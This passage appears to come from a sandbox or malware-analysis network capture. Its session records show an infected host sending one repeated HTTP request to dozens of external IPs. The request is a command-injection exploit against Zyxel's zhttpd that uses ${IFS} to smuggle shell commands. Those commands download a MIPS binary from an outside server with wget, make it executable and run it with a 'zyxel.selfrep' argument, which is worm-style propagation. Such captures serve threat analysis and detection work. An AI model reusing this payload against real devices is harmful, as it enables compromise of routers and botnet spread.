                                            Jan 14, 2024 15:50:40.435151100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4584192.168.2.2346824118.253.218.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435203075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4585192.168.2.2353922124.148.79.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435230017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4586192.168.2.2346582140.187.117.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435257912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4587192.168.2.235070248.222.73.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435273886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4588192.168.2.234980482.113.11.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435292959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4589192.168.2.2354428145.15.34.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435333967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4590192.168.2.235387876.44.18.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435365915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4591192.168.2.235876423.188.6.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435391903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4592192.168.2.234908290.200.221.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435441971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4593192.168.2.2356974159.174.68.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435486078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4594192.168.2.2341658113.218.101.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435534954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4595192.168.2.2349128209.137.7.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435559988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4596192.168.2.2341816101.246.76.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435574055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4597192.168.2.2348486201.68.182.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435620070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4598192.168.2.235739620.102.3.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435642004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4599192.168.2.2340742131.19.185.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435661077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4600192.168.2.2346692135.212.221.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435691118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4601192.168.2.234004046.43.183.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435736895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4602192.168.2.2358378106.111.253.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435739040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4603192.168.2.2345834148.166.12.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435766935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4604192.168.2.233577498.91.239.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435784101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4605192.168.2.2344990191.147.144.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435846090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4606192.168.2.235752045.32.124.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435848951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4607192.168.2.2360860143.97.147.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435875893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4608192.168.2.2343410122.58.208.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435926914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4609192.168.2.233682087.155.103.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435961008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4610192.168.2.2335602155.168.249.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435997963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4611192.168.2.2352060171.7.184.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436013937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4612192.168.2.23513585.19.121.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436034918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4613192.168.2.235409291.5.220.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436048031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4614192.168.2.2347708160.220.39.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436080933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4615192.168.2.2338842196.230.99.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436130047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4616192.168.2.236041672.216.120.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436151028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4617192.168.2.234342060.83.139.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436166048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4618192.168.2.2332802175.93.166.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436223030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4619192.168.2.233548673.121.201.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436255932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4620192.168.2.2333634223.169.78.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436278105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4621192.168.2.2345942217.104.244.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436278105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4622192.168.2.234951667.21.192.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436306000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4623192.168.2.235526425.134.231.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436348915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4624192.168.2.234187634.73.164.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436474085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4625192.168.2.2345310133.26.18.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436496973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4626192.168.2.233518890.237.73.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436531067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4627192.168.2.234772893.144.33.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436562061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4628192.168.2.23517165.177.44.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436604023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4629192.168.2.234886874.38.225.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436628103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4630192.168.2.2340458217.235.215.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436655045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4631192.168.2.2347816200.229.105.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436714888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4632192.168.2.235498452.89.166.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436733961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4633192.168.2.2343098189.17.138.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436759949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4634192.168.2.2343060133.247.34.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436790943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4635192.168.2.2341146206.140.68.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436806917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4636192.168.2.2357706117.99.254.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436826944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4637192.168.2.23546901.250.121.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436855078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4638192.168.2.234640434.76.16.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436877966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4639192.168.2.2343746209.122.41.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436944008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4640192.168.2.234910227.155.116.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436944008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4641192.168.2.2344478216.200.156.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.436994076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4642192.168.2.2357916223.106.167.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437005043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4643192.168.2.2341574104.89.68.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437031984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4644192.168.2.2342668209.0.19.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437088013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4645192.168.2.2358776198.152.106.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.437113047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4646192.168.2.2352330107.32.103.101443
                                            TimestampBytes transferredDirectionData
